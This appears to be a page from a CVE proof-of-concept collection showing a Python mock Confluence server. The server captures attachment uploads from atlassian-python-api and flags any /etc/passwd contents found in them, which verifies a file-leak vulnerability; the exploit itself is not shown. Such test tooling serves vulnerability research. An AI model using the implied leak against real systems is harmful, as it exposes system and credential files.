5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / mock_confluence.py PY
#!/usr/bin/env python3
"""
Mock Confluence REST endpoint for CVE PoC.

Captures the multipart body of PUT /wiki/rest/api/content/{id}/child/attachment
(and the related GETs the atlassian-python-api library does on startup),
writes the raw body to ./captured_body.bin and prints a short summary.

Stdlib only — no flask/aiohttp required.
"""
import http.server
import json
import os
import sys
import threading

CAPTURE_PATH = os.environ.get("CAPTURE_PATH", "/tmp/captured_body.bin")

class Handler(http.server.BaseHTTPRequestHandler):
    def log_message(self, fmt, *args):
        sys.stderr.write("[mock] " + (fmt % args) + "\n")

    def _fake_user(self):
        # atlassian-python-api probes /rest/api/user/current on init.
        body = json.dumps({
            "type": "known", "accountId": "poc",
            "displayName": "poc", "email": "[email protected]",
            "username": "test",
        }).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        self._fake_user()

    def do_POST(self):
        self._handle_upload()

    def do_PUT(self):
        self._handle_upload()

    def _handle_upload(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length) if length else b""
        with open(CAPTURE_PATH, "wb") as f:
            f.write(body)

        sys.stderr.write(
            f"[mock] {self.command} {self.path} "
            f"ct={self.headers.get('Content-Type')!r} len={length}\n"
        )

        # Look for /etc/passwd marker in captured body
        if b"root:x:0:0" in body:
            sys.stderr.write("[mock] FOUND /etc/passwd BYTES IN BODY\n")
        # Generic leak indicator
        sys.stderr.write(f"[mock] body sha first64={body[:64]!r}\n")

        resp = json.dumps({
            "results": [{
                "id": "att999", "title": "leaked",
                "type": "attachment",
                "_links": {"download": "/download/leaked"},
            }]
        }).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(resp)))
        self.end_headers()
        self.wfile.write(resp)


def main():
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8765
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", port), Handler)
    sys.stderr.write(f"[mock] listening on 127.0.0.1:{port}, capture={CAPTURE_PATH}\n")
    try:
        srv.serve_forever()
    except KeyboardInterrupt:
        pass


if __name__ == "__main__":
    main()